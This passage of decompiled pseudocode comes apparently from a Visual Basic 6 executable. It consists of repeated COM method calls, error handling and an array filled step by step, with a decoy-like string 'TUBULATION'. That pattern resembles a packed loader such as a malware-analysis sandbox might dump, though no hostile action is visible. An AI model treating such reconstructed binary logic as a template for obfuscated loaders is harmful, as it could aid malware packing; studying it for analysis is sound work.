				_t2362 =  &_v236;
				L0040178E();
				_v8 = 0xe;
				_v268 = 0x80020004;
				_v276 = 0xa;
				_push( &_v276);
				_push( &_v292);
				L00401770();
				_v400 = L"TUBULATION";
				_v408 = 0x8008;
				_push( &_v292);
				_t1818 =  &_v408;
				_push(_t1818);
				L00401776();
				_v500 = _t1818;
				_push( &_v292);
				_push( &_v276);
				_push(2);
				L004017A0();
				_t2811 = _t2810 + 0xc;
				_t1821 = _v500;
				if(_t1821 != 0) {
					_v8 = 0xf;
					_v300 = 0x80020004;
					_v308 = 0xa;
					_v284 = 0x80020004;
					_v292 = 0xa;
					_v268 = 0x80020004;
					_v276 = 0xa;
					_push( &_v308);
					_push( &_v292);
					_push( &_v276);
					_t2951 =  *0x401408;
					_push(_t2362);
					_push(_t2362);
					_v324 = _t2951;
					asm("fld1");
					_push(_t2362);
					_push(_t2362);
					_v332 = _t2951;
					asm("fld1");
					_push(_t2362);
					_push(_t2362);
					_v340 = _t2951;
					L0040176A();
					_v196 = _t2951;
					_push( &_v308);
					_push( &_v292);
					_push( &_v276);
					_push(3);
					L004017A0();
					_t2820 = _t2811 + 0x10;
					_v8 = 0x10;
					_push( &_v276);
					L00401758();
					_push(1);
					_push( &_v276);
					_push( &_v292);
					L0040175E();
					L00401764();
					L00401794();
					_v8 = 0x11;
					_v8 = 0x12;
					_v364 = 0x80020004;
					_v372 = 0xa;
					_v348 = 0x80020004;
					_v356 = 0xa;
					_v332 = 0x80020004;
					_v340 = 0xa;
					_v316 = 0x80020004;
					_v324 = 0xa;
					_v300 = 0x80020004;
					_v308 = 0xa;
					_v284 = 0x80020004;
					_v292 = 0xa;
					if( *0x425010 != 0) {
						_v724 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v724 = 0x425010;
					}
					_t2272 =  &_v236;
					L004017C4();
					_v500 = _t2272;
					_t2276 =  *((intOrPtr*)( *_v500 + 0x120))(_v500,  &_v224, _t2272,  *((intOrPtr*)( *((intOrPtr*)( *_v724)) + 0x304))( *_v724));
					asm("fclex");
					_v504 = _t2276;
					if(_v504 >= 0) {
						_v728 = _v728 & 0x00000000;
					} else {
						_push(0x120);
						_push(0x4050b0);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v728 = _t2276;
					}
					_v588 = _v224;
					_v224 = _v224 & 0x00000000;
					_v268 = _v588;
					_v276 = 8;
					_push( &_v372);
					_push( &_v356);
					_push( &_v340);
					_push( &_v324);
					_push( &_v308);
					_push( &_v292);
					_push( &_v276);
					L0040174C();
					L00401752();
					L0040178E();
					_push( &_v372);
					_push( &_v356);
					_push( &_v340);
					_push( &_v324);
					_push( &_v308);
					_push( &_v292);
					_t1821 =  &_v276;
					_push(_t1821);
					_push(7);
					L004017A0();
					_t2811 = _t2820 + 0x20;
				}
				_v8 = 0x14;
				_push(0x4050f8);
				L00401746();
				if(_t1821 != 2) {
					_v8 = 0x15;
					if( *0x425698 != 0) {
						_v732 = 0x425698;
					} else {
						_push(0x425698);
						_push(0x405090);
						L004017BE();
						_v732 = 0x425698;
					}
					_v508 =  *_v732;
					_t1969 =  *((intOrPtr*)( *_v508 + 0x14))(_v508,  &_v240);
					asm("fclex");
					_v512 = _t1969;
					if(_v512 >= 0) {
						_v736 = _v736 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x405080);
						_push(_v508);
						_push(_v512);
						L004017B8();
						_v736 = _t1969;
					}
					_v516 = _v240;
					_v384 = 0x80020004;
					_v392 = 0xa;
					if( *0x425010 != 0) {
						_v740 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v740 = 0x425010;
					}
					_t1974 =  &_v236;
					L004017C4();
					_v500 = _t1974;
					_t1978 =  *((intOrPtr*)( *_v500 + 0x1c0))(_v500,  &_v224, _t1974,  *((intOrPtr*)( *((intOrPtr*)( *_v740)) + 0x308))( *_v740));
					asm("fclex");
					_v504 = _t1978;
					if(_v504 >= 0) {
						_v744 = _v744 & 0x00000000;
					} else {
						_push(0x1c0);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v744 = _t1978;
					}
					L00401530();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t1982 =  *((intOrPtr*)( *_v516 + 0x13c))(_v516, _v224, 0x10);
					asm("fclex");
					_v520 = _t1982;
					if(_v520 >= 0) {
						_v748 = _v748 & 0x00000000;
					} else {
						_push(0x13c);
						_push(0x4050c0);
						_push(_v516);
						_push(_v520);
						L004017B8();
						_v748 = _t1982;
					}
					L00401740();
					_push( &_v240);
					_push( &_v236);
					_push(2);
					L004017A6();
					_v8 = 0x16;
					_push(0);
					_push(0x44);
					_push(1);
					_push(8);
					_push( &_v184);
					_push(4);
					_push(0x180);
					L0040173A();
					_t2816 = _t2811 + 0x28;
					_v8 = 0x17;
					_push(0);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x18;
					if( *0x425010 != 0) {
						_v752 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v752 = 0x425010;
					}
					_t1989 =  &_v236;
					L004017C4();
					_v500 = _t1989;
					_t1993 =  *((intOrPtr*)( *_v500 + 0x1c0))(_v500,  &_v224, _t1989,  *((intOrPtr*)( *((intOrPtr*)( *_v752)) + 0x308))( *_v752));
					asm("fclex");
					_v504 = _t1993;
					if(_v504 >= 0) {
						_v756 = _v756 & 0x00000000;
					} else {
						_push(0x1c0);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v756 = _t1993;
					}
					_push(1);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x19;
					_push(2);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x1a;
					_push(3);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x1b;
					if( *0x425010 != 0) {
						_v760 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v760 = 0x425010;
					}
					_t1997 =  &_v236;
					L004017C4();
					_v500 = _t1997;
					_t2001 =  *((intOrPtr*)( *_v500 + 0xa8))(_v500,  &_v224, _t1997,  *((intOrPtr*)( *((intOrPtr*)( *_v760)) + 0x30c))( *_v760));
					asm("fclex");
					_v504 = _t2001;
					if(_v504 >= 0) {
						_v764 = _v764 & 0x00000000;
					} else {
						_push(0xa8);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v764 = _t2001;
					}
					_push(4);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x1c;
					if( *0x425010 != 0) {
						_v768 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v768 = 0x425010;
					}
					_t2005 =  &_v236;
					L004017C4();
					_v500 = _t2005;
					_t2009 =  *((intOrPtr*)( *_v500 + 0x48))(_v500,  &_v224, _t2005,  *((intOrPtr*)( *((intOrPtr*)( *_v768)) + 0x300))( *_v768));
					asm("fclex");
					_v504 = _t2009;
					if(_v504 >= 0) {
						_v772 = _v772 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x405060);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v772 = _t2009;
					}
					_push(5);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x1d;
					_push(6);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x1e;
					_push(7);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x1f;
					_push(8);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x20;
					_push(9);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x21;
					if( *0x425010 != 0) {
						_v776 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v776 = 0x425010;
					}
					_t2013 =  &_v236;
					L004017C4();
					_v500 = _t2013;
					_t2017 =  *((intOrPtr*)( *_v500 + 0xf8))(_v500, 0,  &_v224, _t2013,  *((intOrPtr*)( *((intOrPtr*)( *_v776)) + 0x308))( *_v776));
					asm("fclex");
					_v504 = _t2017;
					if(_v504 >= 0) {
						_v780 = _v780 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v780 = _t2017;
					}
					_push(0xa);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x22;
					if( *0x425010 != 0) {
						_v784 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v784 = 0x425010;
					}
					_t2021 =  &_v236;
					L004017C4();
					_v500 = _t2021;
					_t2025 =  *((intOrPtr*)( *_v500 + 0x130))(_v500,  &_v240, _t2021,  *((intOrPtr*)( *((intOrPtr*)( *_v784)) + 0x300))( *_v784));
					asm("fclex");
					_v504 = _t2025;
					if(_v504 >= 0) {
						_v788 = _v788 & 0x00000000;
					} else {
						_push(0x130);
						_push(0x405060);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v788 = _t2025;
					}
					_push(0);
					_push(0);
					_push(_v240);
					_t2026 =  &_v276;
					_push(_t2026);
					L004017CA();
					_push(_t2026);
					L00401728();
					L00401752();
					_push(0xb);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					_push( &_v240);
					_push( &_v236);
					_push(2);
					L004017A6();
					_t2818 = _t2816 + 0x1c;
					L00401794();
					_v8 = 0x23;
					if( *0x425010 != 0) {
						_v792 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v792 = 0x425010;
					}
					_t2032 =  &_v236;
					L004017C4();
					_v500 = _t2032;
					_t2036 =  *((intOrPtr*)( *_v500 + 0x48))(_v500,  &_v224, _t2032,  *((intOrPtr*)( *((intOrPtr*)( *_v792)) + 0x304))( *_v792));
					asm("fclex");
					_v504 = _t2036;
					if(_v504 >= 0) {
						_v796 = _v796 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x4050b0);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v796 = _t2036;
					}
					_push(0xc);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x24;
					_push(0xd);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x25;
					if( *0x425010 != 0) {
						_v800 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v800 = 0x425010;
					}
					_t2040 =  &_v236;
					L004017C4();
					_v500 = _t2040;
					_t2044 =  *((intOrPtr*)( *_v500 + 0xe8))(_v500, 0,  &_v224, _t2040,  *((intOrPtr*)( *((intOrPtr*)( *_v800)) + 0x304))( *_v800));
					asm("fclex");
					_v504 = _t2044;
					if(_v504 >= 0) {
						_v804 = _v804 & 0x00000000;
					} else {
						_push(0xe8);
						_push(0x4050b0);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v804 = _t2044;
					}
					_push(0xe);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x26;
					_push(0xf);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x27;
					if( *0x425010 != 0) {
						_v808 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v808 = 0x425010;
					}
					_t2048 =  &_v236;
					L004017C4();
					_v500 = _t2048;
					_t2052 =  *((intOrPtr*)( *_v500 + 0x188))(_v500,  &_v224, _t2048,  *((intOrPtr*)( *((intOrPtr*)( *_v808)) + 0x30c))( *_v808));
					asm("fclex");
					_v504 = _t2052;
					if(_v504 >= 0) {
						_v812 = _v812 & 0x00000000;
					} else {
						_push(0x188);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v812 = _t2052;
					}
					_push(0x10);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x28;
					_push(0x11);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x29;
					_push(0x12);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x2a;
					_push(0x13);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x2b;
					if( *0x425010 != 0) {
						_v816 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v816 = 0x425010;
					}
					_t2056 =  &_v236;
					L004017C4();
					_v500 = _t2056;
					_t2060 =  *((intOrPtr*)( *_v500 + 0x188))(_v500,  &_v224, _t2056,  *((intOrPtr*)( *((intOrPtr*)( *_v816)) + 0x308))( *_v816));
					asm("fclex");
					_v504 = _t2060;
					if(_v504 >= 0) {
						_v820 = _v820 & 0x00000000;
					} else {
						_push(0x188);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v820 = _t2060;
					}
					_push(0x14);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x2c;
					_push(0x15);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x2d;
					_push(0x16);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x2e;
					if( *0x425010 != 0) {
						_v824 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v824 = 0x425010;
					}
					_t2064 =  &_v236;
					L004017C4();
					_v500 = _t2064;
					_t2068 =  *((intOrPtr*)( *_v500 + 0x110))(_v500,  &_v224, _t2064,  *((intOrPtr*)( *((intOrPtr*)( *_v824)) + 0x300))( *_v824));
					asm("fclex");
					_v504 = _t2068;
					if(_v504 >= 0) {
						_v828 = _v828 & 0x00000000;
					} else {
						_push(0x110);
						_push(0x405060);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v828 = _t2068;
					}
					_push(0x17);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x2f;
					_push(0x18);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x30;
					_push(0x19);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x31;
					if( *0x425010 != 0) {
						_v832 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v832 = 0x425010;
					}
					_t2072 =  &_v236;
					L004017C4();
					_v500 = _t2072;
					_t2076 =  *((intOrPtr*)( *_v500 + 0x1c0))(_v500,  &_v224, _t2072,  *((intOrPtr*)( *((intOrPtr*)( *_v832)) + 0x308))( *_v832));
					asm("fclex");
					_v504 = _t2076;
					if(_v504 >= 0) {
						_v836 = _v836 & 0x00000000;
					} else {
						_push(0x1c0);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v836 = _t2076;
					}
					_push(0x1a);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x32;
					_push(0x1b);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x33;
					if( *0x425010 != 0) {
						_v840 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v840 = 0x425010;
					}
					_t2080 =  &_v236;
					L004017C4();
					_v500 = _t2080;
					_t2084 =  *((intOrPtr*)( *_v500 + 0xf8))(_v500, 0,  &_v224, _t2080,  *((intOrPtr*)( *((intOrPtr*)( *_v840)) + 0x30c))( *_v840));
					asm("fclex");
					_v504 = _t2084;
					if(_v504 >= 0) {
						_v844 = _v844 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v844 = _t2084;
					}
					_push(0x1c);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x34;
					if( *0x425010 != 0) {
						_v848 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v848 = 0x425010;
					}
					_t2088 =  &_v236;
					L004017C4();
					_v500 = _t2088;
					_t2092 =  *((intOrPtr*)( *_v500 + 0x70))(_v500,  &_v224, _t2088,  *((intOrPtr*)( *((intOrPtr*)( *_v848)) + 0x2fc))( *_v848));
					asm("fclex");
					_v504 = _t2092;
					if(_v504 >= 0) {
						_v852 = _v852 & 0x00000000;
					} else {
						_push(0x70);
						_push(0x4052d8);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v852 = _t2092;
					}
					_push(0x1d);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x35;
					_push(0x1e);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x36;
					if( *0x425010 != 0) {
						_v856 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v856 = 0x425010;
					}
					_t2096 =  &_v236;
					L004017C4();
					_v500 = _t2096;
					_t2100 =  *((intOrPtr*)( *_v500 + 0xf8))(_v500, 0,  &_v224, _t2096,  *((intOrPtr*)( *((intOrPtr*)( *_v856)) + 0x308))( *_v856));
					asm("fclex");
					_v504 = _t2100;
					if(_v504 >= 0) {
						_v860 = _v860 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v860 = _t2100;
					}
					_push(0x1f);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x37;
					_push(0x20);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x38;
					if( *0x425010 != 0) {
						_v864 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v864 = 0x425010;
					}
					_t2104 =  &_v236;
					L004017C4();
					_v500 = _t2104;
					_t2108 =  *((intOrPtr*)( *_v500 + 0x190))(_v500,  &_v224, _t2104,  *((intOrPtr*)( *((intOrPtr*)( *_v864)) + 0x304))( *_v864));
					asm("fclex");
					_v504 = _t2108;
					if(_v504 >= 0) {
						_v868 = _v868 & 0x00000000;
					} else {
						_push(0x190);
						_push(0x4050b0);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v868 = _t2108;
					}
					_push(0x21);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x39;
					if( *0x425010 != 0) {
						_v872 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v872 = 0x425010;
					}
					_t2112 =  &_v236;
					L004017C4();
					_v500 = _t2112;
					_t2116 =  *((intOrPtr*)( *_v500 + 0x120))(_v500,  &_v224, _t2112,  *((intOrPtr*)( *((intOrPtr*)( *_v872)) + 0x304))( *_v872));
					asm("fclex");
					_v504 = _t2116;
					if(_v504 >= 0) {
						_v876 = _v876 & 0x00000000;
					} else {
						_push(0x120);
						_push(0x4050b0);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v876 = _t2116;
					}
					_push(0x22);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x3a;
					if( *0x425010 != 0) {
						_v880 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v880 = 0x425010;
					}
					_t2120 =  &_v236;
					L004017C4();
					_v500 = _t2120;
					_t2124 =  *((intOrPtr*)( *_v500 + 0x1c0))(_v500,  &_v224, _t2120,  *((intOrPtr*)( *((intOrPtr*)( *_v880)) + 0x30c))( *_v880));
					asm("fclex");
					_v504 = _t2124;
					if(_v504 >= 0) {
						_v884 = _v884 & 0x00000000;
					} else {
						_push(0x1c0);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v884 = _t2124;
					}
					_push(0x23);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x3b;
					_push(0x24);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x3c;
					if( *0x425010 != 0) {
						_v888 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v888 = 0x425010;
					}
					_t2128 =  &_v236;
					L004017C4();
					_v500 = _t2128;
					_t2132 =  *((intOrPtr*)( *_v500 + 0xf8))(_v500, 0,  &_v224, _t2128,  *((intOrPtr*)( *((intOrPtr*)( *_v888)) + 0x308))( *_v888));
					asm("fclex");
					_v504 = _t2132;
					if(_v504 >= 0) {
						_v892 = _v892 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v892 = _t2132;
					}
					_push(0x25);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x3d;
					if( *0x425010 != 0) {
						_v896 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v896 = 0x425010;
					}
					_t2136 =  &_v236;
					L004017C4();
					_v500 = _t2136;
					_t2140 =  *((intOrPtr*)( *_v500 + 0x140))(_v500,  &_v224, _t2136,  *((intOrPtr*)( *((intOrPtr*)( *_v896)) + 0x308))( *_v896));
					asm("fclex");
					_v504 = _t2140;
					if(_v504 >= 0) {
						_v900 = _v900 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v900 = _t2140;
					}
					_push(0x26);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x3e;
					if( *0x425010 != 0) {
						_v904 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v904 = 0x425010;
					}
					_t2144 =  &_v236;
					L004017C4();
					_v500 = _t2144;
					_t2148 =  *((intOrPtr*)( *_v500 + 0x188))(_v500,  &_v224, _t2144,  *((intOrPtr*)( *((intOrPtr*)( *_v904)) + 0x308))( *_v904));
					asm("fclex");
					_v504 = _t2148;
					if(_v504 >= 0) {
						_v908 = _v908 & 0x00000000;
					} else {
						_push(0x188);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v908 = _t2148;
					}
					_push(0x27);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x3f;
					_push(0x28);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x40;
					if( *0x425010 != 0) {
						_v912 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v912 = 0x425010;
					}
					_t2152 =  &_v236;
					L004017C4();
					_v500 = _t2152;
					_t2156 =  *((intOrPtr*)( *_v500 + 0x218))(_v500,  &_v224, _t2152,  *((intOrPtr*)( *((intOrPtr*)( *_v912)) + 0x30c))( *_v912));
					asm("fclex");
					_v504 = _t2156;
					if(_v504 >= 0) {
						_v916 = _v916 & 0x00000000;
					} else {
						_push(0x218);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v916 = _t2156;
					}
					_push(0x29);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x41;
					if( *0x425010 != 0) {
						_v920 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v920 = 0x425010;
					}
					_t2160 =  &_v236;
					L004017C4();
					_v500 = _t2160;
					_t2164 =  *((intOrPtr*)( *_v500 + 0x48))(_v500,  &_v224, _t2160,  *((intOrPtr*)( *((intOrPtr*)( *_v920)) + 0x308))( *_v920));
					asm("fclex");
					_v504 = _t2164;
					if(_v504 >= 0) {
						_v924 = _v924 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v924 = _t2164;
					}
					_push(0x2a);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x42;
					if( *0x425010 != 0) {
						_v928 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v928 = 0x425010;
					}
					_t2168 =  &_v236;
					L004017C4();
					_v500 = _t2168;
					_t2172 =  *((intOrPtr*)( *_v500 + 0x188))(_v500,  &_v224, _t2168,  *((intOrPtr*)( *((intOrPtr*)( *_v928)) + 0x308))( *_v928));
					asm("fclex");
					_v504 = _t2172;
					if(_v504 >= 0) {
						_v932 = _v932 & 0x00000000;
					} else {
						_push(0x188);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v932 = _t2172;
					}
					_push(0x2b);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x43;
					if( *0x425010 != 0) {
						_v936 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v936 = 0x425010;
					}
					_t2176 =  &_v236;
					L004017C4();
					_v500 = _t2176;
					_t2180 =  *((intOrPtr*)( *_v500 + 0x140))(_v500,  &_v224, _t2176,  *((intOrPtr*)( *((intOrPtr*)( *_v936)) + 0x30c))( *_v936));
					asm("fclex");
					_v504 = _t2180;
					if(_v504 >= 0) {
						_v940 = _v940 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v940 = _t2180;
					}
					_push(0x2c);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x44;
					_push(0x2d);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x45;
					if( *0x425010 != 0) {
						_v944 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v944 = 0x425010;
					}
					_t2184 =  &_v236;
					L004017C4();
					_v500 = _t2184;
					_t2188 =  *((intOrPtr*)( *_v500 + 0x48))(_v500,  &_v224, _t2184,  *((intOrPtr*)( *((intOrPtr*)( *_v944)) + 0x30c))( *_v944));
					asm("fclex");
					_v504 = _t2188;
					if(_v504 >= 0) {
						_v948 = _v948 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v948 = _t2188;
					}
					_push(0x2e);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x46;
					if( *0x425010 != 0) {
						_v952 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v952 = 0x425010;
					}
					_t2192 =  &_v236;
					L004017C4();
					_v500 = _t2192;
					_t2196 =  *((intOrPtr*)( *_v500 + 0x120))(_v500,  &_v224, _t2192,  *((intOrPtr*)( *((intOrPtr*)( *_v952)) + 0x304))( *_v952));
					asm("fclex");
					_v504 = _t2196;
					if(_v504 >= 0) {
						_v956 = _v956 & 0x00000000;
					} else {
						_push(0x120);
						_push(0x4050b0);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v956 = _t2196;
					}
					_push(0x2f);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x47;
					_push(0x30);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x48;
					_push(0x31);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x49;
					_push(0x32);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x4a;
					if( *0x425010 != 0) {
						_v960 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v960 = 0x425010;
					}
					_t2200 =  &_v236;
					L004017C4();
					_v500 = _t2200;
					_t2204 =  *((intOrPtr*)( *_v500 + 0x48))(_v500,  &_v224, _t2200,  *((intOrPtr*)( *((intOrPtr*)( *_v960)) + 0x300))( *_v960));
					asm("fclex");
					_v504 = _t2204;
					if(_v504 >= 0) {
						_v964 = _v964 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x405060);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v964 = _t2204;
					}
					_push(0x33);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x4b;
					_push(0x34);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x4c;
					_push(0x35);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x4d;
					if( *0x425010 != 0) {
						_v968 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v968 = 0x425010;
					}
					_t2208 =  &_v236;
					L004017C4();
					_v500 = _t2208;
					_t2212 =  *((intOrPtr*)( *_v500 + 0x48))(_v500,  &_v224, _t2208,  *((intOrPtr*)( *((intOrPtr*)( *_v968)) + 0x2fc))( *_v968));
					asm("fclex");
					_v504 = _t2212;
					if(_v504 >= 0) {
						_v972 = _v972 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x4052d8);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v972 = _t2212;
					}
					_push(0x36);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x4e;
					if( *0x425010 != 0) {
						_v976 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
						_v976 = 0x425010;
					}
					_t2216 =  &_v236;
					L004017C4();
					_v500 = _t2216;
					_t2220 =  *((intOrPtr*)( *_v500 + 0xa8))(_v500,  &_v224, _t2216,  *((intOrPtr*)( *((intOrPtr*)( *_v976)) + 0x308))( *_v976));
					asm("fclex");
					_v504 = _t2220;
					if(_v504 >= 0) {
						_v980 = _v980 & 0x00000000;
					} else {
						_push(0xa8);
						_push(0x405050);
						_push(_v500);
						_push(_v504);
						L004017B8();
						_v980 = _t2220;
					}
					_push(0x37);
					_push(_v184);
					L0040172E();
					L00401734();
					L00401740();
					L0040178E();
					_v8 = 0x4f;
					_push(0x38);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x50;
					_push(0x39);
					_push(_v184);
					L0040172E();
					L00401734();
					_v8 = 0x51;
					if( *0x425010 != 0) {
						_v984 = 0x425010;
					} else {
						_push(0x425010);
						_push(0x404370);
						L004017BE();
